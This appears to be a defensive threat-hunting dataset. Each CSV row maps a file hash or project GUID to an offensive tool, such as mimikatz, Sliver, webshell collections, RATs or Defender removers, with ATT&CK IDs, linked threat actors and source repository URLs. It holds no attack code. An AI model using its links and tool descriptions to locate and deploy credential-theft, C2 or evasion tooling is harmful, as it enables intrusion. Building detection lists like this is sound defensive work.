"*2ab5af4a7fa7d14b4a4facef9b4d80bd3ada7e20c36712ece61ce9c294107745*",".{0,1000}2ab5af4a7fa7d14b4a4facef9b4d80bd3ada7e20c36712ece61ce9c294107745.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","#filehash","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","23761"
"*2ac9118877d2f38cfb75a17e0c0cb4ac845398e55588925fa775fc3fea93b319*",".{0,1000}2ac9118877d2f38cfb75a17e0c0cb4ac845398e55588925fa775fc3fea93b319.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23767"
"*2ac9118877d2f38cfb75a17e0c0cb4ac845398e55588925fa775fc3fea93b319*",".{0,1000}2ac9118877d2f38cfb75a17e0c0cb4ac845398e55588925fa775fc3fea93b319.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23768"
"*2acacde7e826893c20412c5cc6e2bceb804757e030c477f743341767bb98f951*",".{0,1000}2acacde7e826893c20412c5cc6e2bceb804757e030c477f743341767bb98f951.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23769"
"*2acfc293585568970aa8ea676822e0c905d4eec4c0f8c743f58ce1b099dbe29d*",".{0,1000}2acfc293585568970aa8ea676822e0c905d4eec4c0f8c743f58ce1b099dbe29d.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","23772"
"*2ad1fbe554f2568cacd173a5dce1f3f87dc7e2005b1fe1dd73646a8ab9a5d1ad*",".{0,1000}2ad1fbe554f2568cacd173a5dce1f3f87dc7e2005b1fe1dd73646a8ab9a5d1ad.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","#filehash","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","23773"
"*2ad2ad0002ad2ad00042d42d000000ad9bf51cc3f5a1e29eecb81d0c7b06eb*",".{0,1000}2ad2ad0002ad2ad00042d42d000000ad9bf51cc3f5a1e29eecb81d0c7b06eb.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","#jarm","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","23774"
"*2AD3951D-DEA6-4CF7-88BE-4C73344AC9DA*",".{0,1000}2AD3951D\-DEA6\-4CF7\-88BE\-4C73344AC9DA.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#GUIDproject","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","23775"
"*2ae02fc1566cb4e055e56ff446f6de80fcaf953da0fcad0ed93b6454b9fba4f1*",".{0,1000}2ae02fc1566cb4e055e56ff446f6de80fcaf953da0fcad0ed93b6454b9fba4f1.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","23778"
"*2AE886C3-3272-40BE-8D3C-EBAEDE9E61E1*",".{0,1000}2AE886C3\-3272\-40BE\-8D3C\-EBAEDE9E61E1.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","0","#GUIDproject","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","23780"
"*2AE886C3-3272-40BE-8D3C-EBAEDE9E61E1*",".{0,1000}2AE886C3\-3272\-40BE\-8D3C\-EBAEDE9E61E1.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","#GUIDproject","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","23781"
"*2AE886C3-3272-40BE-8D3C-EBAEDE9E61E1*",".{0,1000}2AE886C3\-3272\-40BE\-8D3C\-EBAEDE9E61E1.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#GUIDproject","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","23782"
"*2aea0b4e3612b01d4550d3014d4324db74406a66e0ab14802b7033564a5771eb*",".{0,1000}2aea0b4e3612b01d4550d3014d4324db74406a66e0ab14802b7033564a5771eb.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","23783"
"*2afcf7aa79d17989aac2b1b3ecca95d2c30659a951d4626e4f0d0fc73e1093f3*",".{0,1000}2afcf7aa79d17989aac2b1b3ecca95d2c30659a951d4626e4f0d0fc73e1093f3.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23785"
"*2b085c6ae8a6a6754f6e62bebf63655eb73759ee05f6e3a625fd8fe48c3a681e*",".{0,1000}2b085c6ae8a6a6754f6e62bebf63655eb73759ee05f6e3a625fd8fe48c3a681e.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23786"
"*2b0a1ea2047bacd811ae1945de0e7a6709565c0ac8f67c01728965b587c27415*",".{0,1000}2b0a1ea2047bacd811ae1945de0e7a6709565c0ac8f67c01728965b587c27415.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23788"
"*2b0ae5d810f64cc33f7f5df193aa56c3f39d85b0447242491da024b0a1b1a45a*",".{0,1000}2b0ae5d810f64cc33f7f5df193aa56c3f39d85b0447242491da024b0a1b1a45a.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","23789"
"*2b28e9992fa85d77397f442efeb893814d68c6d97a525ebe8d900e6bda043ac4*",".{0,1000}2b28e9992fa85d77397f442efeb893814d68c6d97a525ebe8d900e6bda043ac4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23792"
"*2b2b84ccdf5351dab81dbd87860fcfbf61bf44a88fb547a7f4a3cc71667c7362*",".{0,1000}2b2b84ccdf5351dab81dbd87860fcfbf61bf44a88fb547a7f4a3cc71667c7362.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","0","#filehash","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","23793"
"*2b38b8acc2d37042c0f5c2a8932f59ce8d5556103a54f2665a648476d214cc45*",".{0,1000}2b38b8acc2d37042c0f5c2a8932f59ce8d5556103a54f2665a648476d214cc45.{0,1000}","offensive_tool_keyword","CheckSMBSigning","Checks for SMB signing disabled on all hosts in the network","T1018 - T1550","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Leo4j/CheckSMBSigning","1","0","#filehash","N/A","6","1","8","1","2023-10-13T11:55:33Z","2023-05-17T11:47:52Z","23795"
"*2b3c71c9430092f6b3d0c8675d99eee23b80410612971e902245176baf46c9cb*",".{0,1000}2b3c71c9430092f6b3d0c8675d99eee23b80410612971e902245176baf46c9cb.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","23797"
"*2B47F84C-9CA3-47E9-9970-8AF8233A9F12*",".{0,1000}2B47F84C\-9CA3\-47E9\-9970\-8AF8233A9F12.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","23802"
"*2b4cfde821fbe62d20d7e16e2cb8849a4847f446a7830a6f21905e791835e549*",".{0,1000}2b4cfde821fbe62d20d7e16e2cb8849a4847f446a7830a6f21905e791835e549.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","23803"
"*2b4d99a0fed0b109882531b7feab2545d45854c699d2f274bad28f256bdfaf78*",".{0,1000}2b4d99a0fed0b109882531b7feab2545d45854c699d2f274bad28f256bdfaf78.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","23804"
"*2b5afb8a567d9703dfb416099fb0452e2b4b4da5170f0b23cd3b812df2e9319c*",".{0,1000}2b5afb8a567d9703dfb416099fb0452e2b4b4da5170f0b23cd3b812df2e9319c.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","23806"
"*2b5e05019d56c493715bbc485747a383bfb6dd8c2d44aa0f54fdbcf9cec78d4a*",".{0,1000}2b5e05019d56c493715bbc485747a383bfb6dd8c2d44aa0f54fdbcf9cec78d4a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23809"
"*2b5fb43fb67ba0113f19691f759628dfa46bb2fa568fb683bda8e5c4b5b6df06*",".{0,1000}2b5fb43fb67ba0113f19691f759628dfa46bb2fa568fb683bda8e5c4b5b6df06.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","23810"
"*2b67667ea1e642207fbcfb15335007a6a49f6c28326032b014ba20471e233c74*",".{0,1000}2b67667ea1e642207fbcfb15335007a6a49f6c28326032b014ba20471e233c74.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23811"
"*2b67fbf351f08b878a611aeceb69fd1825f2c804b78aec158d56cba58b65a378*",".{0,1000}2b67fbf351f08b878a611aeceb69fd1825f2c804b78aec158d56cba58b65a378.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","23812"
"*2b6e6ca400190f98d1bf00cc5d50c728364c75db258043fe26b5f014c19c7188*",".{0,1000}2b6e6ca400190f98d1bf00cc5d50c728364c75db258043fe26b5f014c19c7188.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","23813"
"*2b6ef9f4b59e06238caf0e4c79e023356784eff5d49313e7fae8539cc47a65ca*",".{0,1000}2b6ef9f4b59e06238caf0e4c79e023356784eff5d49313e7fae8539cc47a65ca.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","23814"
"*2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1*",".{0,1000}2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/","1","0","#filehash","webshell used with proxylogon exploitation","10","10","N/A","N/A","N/A","N/A","23815"
"*2B704D89-41B9-4051-A51C-36A82ACEBE10*",".{0,1000}2B704D89\-41B9\-4051\-A51C\-36A82ACEBE10.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#GUIDproject","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","23816"
"*2b8c3873a05907a9f2d211fdc992666345d060c7376b6e9760fb800a4a54076c*",".{0,1000}2b8c3873a05907a9f2d211fdc992666345d060c7376b6e9760fb800a4a54076c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23817"
"*2B914EE7-F206-4A83-B435-460D054315BB*",".{0,1000}2B914EE7\-F206\-4A83\-B435\-460D054315BB.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","23819"
"*2b92652d4909d39e12fc9320188f9e834b82f80d3aba92dea4267608f3543861*",".{0,1000}2b92652d4909d39e12fc9320188f9e834b82f80d3aba92dea4267608f3543861.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23820"
"*2b94da663635e7a44ea485c80f1b6ade7a05a6f8a927c80568c2570b98ed29e2*",".{0,1000}2b94da663635e7a44ea485c80f1b6ade7a05a6f8a927c80568c2570b98ed29e2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23822"
"*2b9c9f74214777f8f564643b376c03b6517edb200bb62c832d17c154123aaca4*",".{0,1000}2b9c9f74214777f8f564643b376c03b6517edb200bb62c832d17c154123aaca4.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23824"
"*2b9f65496220a60c706897a88ed0417cdd57d1fe8c7af22abf2a69e718a0e1fc*",".{0,1000}2b9f65496220a60c706897a88ed0417cdd57d1fe8c7af22abf2a69e718a0e1fc.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","23825"
"*2ba17d622736a4d3132c17db3b8c725f001fdbe7fca4b9b4248262b5e54a4107*",".{0,1000}2ba17d622736a4d3132c17db3b8c725f001fdbe7fca4b9b4248262b5e54a4107.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#filehash","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","23826"
"*2ba719023361de2ac1f7c68c9d4081860aa70eca707662e142f89048d7a89859*",".{0,1000}2ba719023361de2ac1f7c68c9d4081860aa70eca707662e142f89048d7a89859.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23828"
"*2bb07676482a8d332efd72aeb151af750b90d5e5e67fe75752dba92f3bc74786*",".{0,1000}2bb07676482a8d332efd72aeb151af750b90d5e5e67fe75752dba92f3bc74786.{0,1000}","offensive_tool_keyword","Dispossessor","CleanRDP.bat script erasing RDP traces used by Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","23830"
"*2bb27f59beed6f28e048b581de811a1443aa880dc8172f3156146c4cf782b68b*",".{0,1000}2bb27f59beed6f28e048b581de811a1443aa880dc8172f3156146c4cf782b68b.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23831"
"*2bcf6152e45cf60959f276a1e7482752895a5b17dc4d4a307a470c1a40284705*",".{0,1000}2bcf6152e45cf60959f276a1e7482752895a5b17dc4d4a307a470c1a40284705.{0,1000}","offensive_tool_keyword","PySQLRecon","Offensive MSSQL toolkit written in Python, based off SQLRecon","T1040 - T1078 - T1072 - T1223 - T1059 - T1213","TA0001 - TA0002 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Tw1sm/PySQLRecon","1","0","#filehash","N/A","10","3","201","15","2025-01-12T02:14:59Z","2023-09-03T01:14:35Z","23835"
"*2bd33a784af634af7590ad9dc43d574005dd95b2b2e20640b97cff0474af91c6*",".{0,1000}2bd33a784af634af7590ad9dc43d574005dd95b2b2e20640b97cff0474af91c6.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","#filehash","N/A","10","","N/A","","","","23837"
"*2bd985502d207cb415eab56024e67a963e2b6c07d681f8c9ffb173fd5244cf33*",".{0,1000}2bd985502d207cb415eab56024e67a963e2b6c07d681f8c9ffb173fd5244cf33.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","23839"
